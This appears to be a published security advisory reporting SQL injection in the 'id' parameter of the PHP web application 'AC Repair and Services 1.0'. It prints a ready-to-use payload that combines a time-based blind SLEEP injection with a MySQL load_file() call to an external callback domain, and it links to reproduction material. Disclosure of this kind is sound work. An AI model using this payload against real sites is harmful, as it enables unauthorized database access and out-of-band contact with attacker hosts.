AC Repair And Services 1.0 SQL Injection

2023.05.03

Credit: nu11secur1ty

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

## Title: AC Repair and Services-2023-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 05.01.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-acrss.zip
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `id` parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\ik6wj36vs4uyp5d7amwk4tdsdjjc739r0uolbcz1.namaikatiputkatatupa.com\\cbc'))+'
was submitted in the id parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.

STATUS: HIGH Vulnerability

[+]Payload:
```mysql
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=services/view_service&id=1'+(select
load_file('\\\\ik6wj36vs4uyp5d7amwk4tdsdjjc739r0uolbcz1.namaikatiputkatatupa.com\\cbc'))+''
AND (SELECT 6992 FROM (SELECT(SLEEP(3)))eeOg) AND 'PsSH'='PsSH
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/AC-Repair-and-Services-2023-1.0)

## Proof and Exploit:
[href](https://streamable.com/pfigvu)

## Time spend:
01:00:00

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

AC Repair And Services 1.0 SQL Injection

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

AC Repair And Services 1.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.